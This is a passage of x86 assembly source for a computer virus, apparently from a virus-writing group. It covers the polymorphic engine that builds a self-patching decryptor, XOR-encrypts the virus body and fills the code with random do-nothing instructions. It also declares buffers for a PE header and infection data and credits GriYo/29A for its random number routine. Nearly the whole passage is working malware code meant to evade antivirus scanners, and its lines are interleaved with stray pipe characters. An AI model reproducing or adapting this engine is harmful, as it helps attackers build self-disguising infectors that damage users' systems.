cmp edx,080h-5 ;80h = max JZ distance, 5 is size of JMP BACK
|
|||
|
ja regenerate
|
|||
|
|
|||
|
|
|||
|
;----JMP BACK----
|
|||
|
sub esi,edi
|
|||
|
mov al,0e9h
|
|||
|
stosb
|
|||
|
mov eax,0fffffffbh
|
|||
|
add eax,esi
|
|||
|
stosd
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;----PATCH JZ----
|
|||
|
pop esi ;esi-1 = jz value
|
|||
|
|
|||
|
mov eax,edi
|
|||
|
sub eax,esi
|
|||
|
mov byte ptr [esi-1],al
|
|||
|
|
|||
|
;----------------
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
|
|||
|
;----POPAD-------
|
|||
|
mov al,61h ;popad
|
|||
|
stosb
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
|
|||
|
;----PATCH LEA---
|
|||
|
pop esi ;patch LEA reg1,[EAX+startofcrypted]
|
|||
|
push edi
|
|||
|
sub edi,offset viruscopy-start
|
|||
|
sub edi,ebp
|
|||
|
mov dword ptr [esi+2],edi
|
|||
|
pop edi
|
|||
|
;----------------
|
|||
|
|
|||
|
|
|||
|
mov ecx,virusz/4 ;copy encrypted virus code after poly
|
|||
|
mov esi,ebp ;decryptors
|
|||
|
cryptit:
|
|||
|
lodsd
|
|||
|
xor eax,ebx
|
|||
|
stosd
|
|||
|
loop cryptit
|
|||
|
|
|||
|
sub edi,offset viruscopy-start
|
|||
|
sub edi,ebp
|
|||
|
mov ecx,edi ;virus size + poly in ECX
|
|||
|
|
|||
|
pop edi
|
|||
|
pop esi
|
|||
|
pop edx
|
|||
|
pop ebx
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
; Generates lot of rnd instructions which look good but do nothing
|
|||
|
; (they undo themself indirect)
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
gengarbage:
|
|||
|
push eax
|
|||
|
push ebx
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
push esi
|
|||
|
|
|||
|
garbageloop:
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
and al,1111b
|
|||
|
|
|||
|
cmp al,1
|
|||
|
je genadd ;OK
|
|||
|
|
|||
|
cmp al,2
|
|||
|
je gensub ;OK
|
|||
|
|
|||
|
cmp al,3
|
|||
|
je genxor ;OK
|
|||
|
|
|||
|
cmp al,4
|
|||
|
je genmov ;OK
|
|||
|
|
|||
|
cmp al,5
|
|||
|
je genpush ;OK
|
|||
|
|
|||
|
cmp al,6
|
|||
|
je geninc ;OK
|
|||
|
|
|||
|
cmp al,7
|
|||
|
je gendec ;OK
|
|||
|
|
|||
|
cmp al,8
|
|||
|
je gencmp ;OK
|
|||
|
|
|||
|
cmp al,9
|
|||
|
je genjunk ;OK
|
|||
|
|
|||
|
cmp al,0eh
|
|||
|
jb garbageloop
|
|||
|
|
|||
|
exitgen:
|
|||
|
|
|||
|
pop esi
|
|||
|
pop edx
|
|||
|
pop ecx
|
|||
|
pop ebx
|
|||
|
pop eax
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random add
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
genadd:
|
|||
|
call getrndal
|
|||
|
|
|||
|
cmp al,4
|
|||
|
je genadd ;4 = esp, leave him alone
|
|||
|
|
|||
|
cmp ah,80h
|
|||
|
jb addandsub ;generate an add - code - sub
|
|||
|
|
|||
|
and eax,111b
|
|||
|
|
|||
|
cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
|
|||
|
ja savetoadd ;yep
|
|||
|
|
|||
|
call pushregister
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
call randomadd ;adds a value or register
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
call popregister
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
savetoadd:
|
|||
|
call randomadd
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
addandsub:
|
|||
|
push eax
|
|||
|
|
|||
|
xchg al,ah
|
|||
|
mov al,081h
|
|||
|
add ah,0c0h
|
|||
|
|
|||
|
stosw
|
|||
|
push eax
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
stosd
|
|||
|
push eax
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
pop ebx
|
|||
|
pop eax
|
|||
|
|
|||
|
add ah,028h
|
|||
|
stosw
|
|||
|
mov eax,ebx
|
|||
|
stosd
|
|||
|
|
|||
|
pop eax
|
|||
|
jmp exitgen
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random sub
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
gensub:
|
|||
|
call getrndal
|
|||
|
|
|||
|
cmp al,4
|
|||
|
je gensub ;4 = esp, leave him alone
|
|||
|
|
|||
|
cmp ah,80h
|
|||
|
jb subandadd ;generate an add - code - sub
|
|||
|
|
|||
|
and eax,111b
|
|||
|
|
|||
|
cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
|
|||
|
ja savetosub ;yep
|
|||
|
|
|||
|
call pushregister
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
call randomsub ;adds a value or register
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
call popregister
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
savetosub:
|
|||
|
|
|||
|
call randomsub
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
subandadd:
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
xchg al,ah
|
|||
|
mov al,081h
|
|||
|
add ah,0e8h
|
|||
|
|
|||
|
stosw
|
|||
|
push eax
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
stosd
|
|||
|
push eax
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
pop ebx
|
|||
|
pop eax
|
|||
|
|
|||
|
sub ah,028h
|
|||
|
stosw
|
|||
|
mov eax,ebx
|
|||
|
stosd
|
|||
|
|
|||
|
pop eax
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random xor
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
genxor:
|
|||
|
call getrndal
|
|||
|
|
|||
|
cmp al,4
|
|||
|
je genxor
|
|||
|
|
|||
|
cmp ah,80h
|
|||
|
jb genxorxor ;generate an xor - code - xor
|
|||
|
|
|||
|
and eax,111b
|
|||
|
|
|||
|
cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
|
|||
|
ja savetoxor ;yep
|
|||
|
|
|||
|
call pushregister ;first push
|
|||
|
|
|||
|
call gengarbage ;generate some garbage
|
|||
|
|
|||
|
call randomxor ;xors with a value or register
|
|||
|
|
|||
|
call gengarbage ;generate some garbage
|
|||
|
|
|||
|
call popregister ;and pop it
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
savetoxor:
|
|||
|
|
|||
|
call randomxor
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
genxorxor:
|
|||
|
push eax
|
|||
|
|
|||
|
xchg al,ah
|
|||
|
add ah,0f0h
|
|||
|
mov al,081h
|
|||
|
|
|||
|
stosw
|
|||
|
push eax
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
stosd
|
|||
|
push eax
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
pop ebx
|
|||
|
pop eax
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
mov eax,ebx
|
|||
|
|
|||
|
stosd
|
|||
|
|
|||
|
pop eax
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random mov
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
genmov:
|
|||
|
call getrndal
|
|||
|
|
|||
|
cmp al,4
|
|||
|
je genmov
|
|||
|
|
|||
|
and eax,111b ; eax <- al
|
|||
|
|
|||
|
cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
|
|||
|
ja savetomov ;yep
|
|||
|
|
|||
|
call pushregister ;first push
|
|||
|
|
|||
|
call gengarbage ;generate some garbage
|
|||
|
|
|||
|
call randommov ;movs a value or register
|
|||
|
|
|||
|
call gengarbage ;generate some garbage
|
|||
|
|
|||
|
call popregister ;and pop it
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
savetomov:
|
|||
|
|
|||
|
call randommov
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random push
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
genpush:
|
|||
|
call getrndal
|
|||
|
cmp al,4
|
|||
|
je genpush
|
|||
|
|
|||
|
and eax,111b
|
|||
|
|
|||
|
call pushregister
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
call popregister
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random inc
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
geninc: ;40
|
|||
|
call getrndal
|
|||
|
cmp al,4
|
|||
|
je geninc
|
|||
|
|
|||
|
cmp ah,80h
|
|||
|
ja genincdec
|
|||
|
|
|||
|
and eax,111b
|
|||
|
|
|||
|
cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
|
|||
|
ja savetoinc
|
|||
|
|
|||
|
call pushregister
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
add al,040h
|
|||
|
stosb
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
sub al,040h
|
|||
|
|
|||
|
call popregister
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
savetoinc:
|
|||
|
add al,040h
|
|||
|
stosb
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
genincdec:
|
|||
|
add al,40h ;inc
|
|||
|
stosb
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
add al,8 ;dec
|
|||
|
stosb
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random dec
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
gendec: ;48
|
|||
|
call getrndal
|
|||
|
cmp al,4
|
|||
|
je gendec
|
|||
|
|
|||
|
cmp ah,80h
|
|||
|
ja gendecinc
|
|||
|
|
|||
|
and eax,111b
|
|||
|
|
|||
|
cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
|
|||
|
ja savetodec
|
|||
|
|
|||
|
call pushregister
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
add al,048h
|
|||
|
stosb
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
sub al,048h
|
|||
|
|
|||
|
call popregister
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
savetodec:
|
|||
|
add al,048h
|
|||
|
stosb
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
gendecinc:
|
|||
|
add al,48h
|
|||
|
stosb
|
|||
|
|
|||
|
call gengarbage
|
|||
|
|
|||
|
sub al,8h
|
|||
|
stosb
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Pushes register in al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
pushregister:
|
|||
|
push eax
|
|||
|
|
|||
|
inc byte ptr [ebp+offset pushtable+eax-start] ;set flag for reg.
|
|||
|
|
|||
|
add al,050h
|
|||
|
stosb
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Pops register in al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
popregister:
|
|||
|
push eax
|
|||
|
|
|||
|
dec byte ptr [ebp+offset pushtable+eax-start] ;unflag for reg.
|
|||
|
|
|||
|
add al,058h
|
|||
|
stosb
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random add reg, value or add reg1,reg2 - reg = al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randomadd:
|
|||
|
push eax
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
cmp al,80h
|
|||
|
pop eax
|
|||
|
push eax
|
|||
|
ja addregreg
|
|||
|
|
|||
|
call randomaddvalue
|
|||
|
|
|||
|
rndaddb:
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
addregreg:
|
|||
|
call randomaddreg
|
|||
|
jmp rndaddb
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random add reg,value - reg = al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
; 81 c0+reg value
|
|||
|
; reg = eax 05 value
|
|||
|
|
|||
|
randomaddvalue:
|
|||
|
push eax
|
|||
|
|
|||
|
or al,al ;reg = eax?
|
|||
|
jz addeax ;special
|
|||
|
|
|||
|
xchg al,ah
|
|||
|
mov al,081h
|
|||
|
add ah,0c0h
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
backfromaddeax:
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
stosd
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
addeax:
|
|||
|
|
|||
|
mov al,05h
|
|||
|
stosb
|
|||
|
jmp backfromaddeax
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random add reg1,reg2 - reg1 = al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randomaddreg:
|
|||
|
push eax
|
|||
|
|
|||
|
mov bl,al
|
|||
|
|
|||
|
call getrndal
|
|||
|
|
|||
|
shl bl,3
|
|||
|
|
|||
|
or al,bl ;mix instructions
|
|||
|
|
|||
|
add al,0c0h
|
|||
|
mov ah,03h
|
|||
|
xchg ah,al
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random sub reg, value or sub reg1,reg2 - reg = al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randomsub:
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
cmp al,80h
|
|||
|
pop eax
|
|||
|
push eax
|
|||
|
ja subregreg
|
|||
|
|
|||
|
call randomsubvalue
|
|||
|
|
|||
|
rndsubb:
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
subregreg:
|
|||
|
call randomsubreg
|
|||
|
jmp rndsubb
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random sub reg,value - reg = al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
; 81 c0+reg value
|
|||
|
; reg = eax 05 value
|
|||
|
|
|||
|
randomsubvalue:
|
|||
|
push eax
|
|||
|
|
|||
|
or al,al ;reg = eax?
|
|||
|
jz subeax ;special
|
|||
|
|
|||
|
xchg al,ah
|
|||
|
mov al,081h
|
|||
|
add ah,0e8h
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
backfromsubeax:
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
stosd
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
subeax:
|
|||
|
|
|||
|
mov al,05h
|
|||
|
stosb
|
|||
|
jmp backfromsubeax
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates random sub reg1,reg2 - reg1 = al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randomsubreg:
|
|||
|
push eax
|
|||
|
|
|||
|
mov bl,al
|
|||
|
|
|||
|
call getrndal
|
|||
|
|
|||
|
shl bl,3
|
|||
|
|
|||
|
or al,bl ;mix instructions
|
|||
|
|
|||
|
add al,0c0h
|
|||
|
mov ah,03h
|
|||
|
xchg ah,al
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates a xor reg, value or xor reg, reg2 - reg = al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randomxor:
|
|||
|
|
|||
|
push eax
|
|||
|
call get_rnd32
|
|||
|
cmp al,80h
|
|||
|
pop eax
|
|||
|
push eax
|
|||
|
ja xorvalue
|
|||
|
|
|||
|
call randomxorreg
|
|||
|
|
|||
|
rndxorr:
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
xorvalue:
|
|||
|
|
|||
|
call randomxorvalue
|
|||
|
jmp rndxorr
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates a random xor reg,reg2 - reg = al
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randomxorreg:
|
|||
|
push eax ;6633
|
|||
|
|
|||
|
mov bl,al
|
|||
|
|
|||
|
call getrndal
|
|||
|
|
|||
|
shl bl,3
|
|||
|
|
|||
|
or al,bl ;mix instructions
|
|||
|
|
|||
|
add al,0c0h
|
|||
|
mov ah,033h
|
|||
|
|
|||
|
xchg ah,al
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates a random xor reg,value
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randomxorvalue:
|
|||
|
push eax
|
|||
|
|
|||
|
add al,0f0h
|
|||
|
mov ah,081h
|
|||
|
|
|||
|
xchg al,ah
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
stosd
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; generates a random mov reg,value or reg,reg2
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randommov:
|
|||
|
push eax
|
|||
|
|
|||
|
cmp ah,080h
|
|||
|
jb movreg
|
|||
|
|
|||
|
call randommovvalue
|
|||
|
|
|||
|
movback:
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
movreg:
|
|||
|
call randommovreg
|
|||
|
jmp movback
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generates a random mov reg,value
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randommovvalue:
|
|||
|
push eax
|
|||
|
|
|||
|
add al,0b8h
|
|||
|
|
|||
|
stosb
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
stosd
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; generates a random mov reg,reg2
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
randommovreg: ;8b (c0+reg) or reg2
|
|||
|
push eax
|
|||
|
mov bl,al
|
|||
|
|
|||
|
call getrndal
|
|||
|
|
|||
|
shl bl,3
|
|||
|
|
|||
|
or al,bl ;mix instructions
|
|||
|
|
|||
|
xchg ah,al
|
|||
|
|
|||
|
mov al,08bh
|
|||
|
add ah,0c0h
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; generates a random cmp reg,reg2 or cmp reg,value
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
gencmp: ;39/3b
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
cmp ah,0c0h
|
|||
|
jb gencmp
|
|||
|
|
|||
|
cmp al,80h
|
|||
|
ja gencmpvalue
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
mov bh,039h
|
|||
|
cmp al,80h
|
|||
|
ja gencmp1
|
|||
|
add bh,2
|
|||
|
gencmp1:
|
|||
|
|
|||
|
pop eax
|
|||
|
|
|||
|
mov al,bh
|
|||
|
|
|||
|
cld
|
|||
|
stosw
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
gencmpvalue: ;81f8
|
|||
|
|
|||
|
and eax,0111b
|
|||
|
add ax,081f8h
|
|||
|
|
|||
|
xchg al,ah
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
call get_rnd32
|
|||
|
|
|||
|
stosd
|
|||
|
jmp exitgen
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Generate junk f8 - fd
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
genjunk:
|
|||
|
call get_rnd32
|
|||
|
cmp al,0f8h
|
|||
|
jb genjunk
|
|||
|
cmp al,0fdh
|
|||
|
ja genjunk
|
|||
|
|
|||
|
stosb
|
|||
|
|
|||
|
jmp exitgen
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
getrndal:
|
|||
|
call get_rnd32
|
|||
|
and al,111b
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
rdtcs equ <dw 310Fh>
|
|||
|
|
|||
|
get_rnd32: ;main part by GriYo / 29A
|
|||
|
push ecx
|
|||
|
push ebx
|
|||
|
push edx
|
|||
|
push edi
|
|||
|
push esi
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+rnd32_seed-start]
|
|||
|
mov ecx,eax
|
|||
|
imul eax,41C64E6Dh
|
|||
|
add eax,00003039h
|
|||
|
mov dword ptr [ebp+rnd32_seed-start],eax
|
|||
|
|
|||
|
xchg eax,ecx
|
|||
|
rdtcs ;just 4 some xtra randomness
|
|||
|
xchg eax,ecx
|
|||
|
xor eax,ecx
|
|||
|
|
|||
|
pop esi
|
|||
|
pop edi
|
|||
|
pop edx
|
|||
|
pop ebx
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
|
|||
|
polyend:
|
|||
|
|
|||
|
db "(c)" ;just some junk
|
|||
|
|
|||
|
end:
|
|||
|
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
|
|||
|
|
|||
|
pointertope dd ?
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
death dd ? ;kill ourself flag
|
|||
|
endif
|
|||
|
|
|||
|
busy dd ?
|
|||
|
filename db 100h dup (0h)
|
|||
|
peheader db 1024 dup (0h)
|
|||
|
whereappend dd ?
|
|||
|
pushtable db 8 dup (0h)
|
|||
|
|
|||
|
viruscopy db (virusz+1000) dup (0h) ;virussize + poly
|
|||
|
|
|||
|
memend:
|
|||
|
|
|||
|
_CODE ends
|
|||
|
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
_DATA segment dword use32 public 'DATA'
|
|||
|
fill db ?
|
|||
|
_DATA ends
|
|||
|
_burp segment dword use32 public 'LiFEwiRE'
|
|||
|
fill2 db ?
|
|||
|
_burp ends
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
end start
|
|||
|
end
|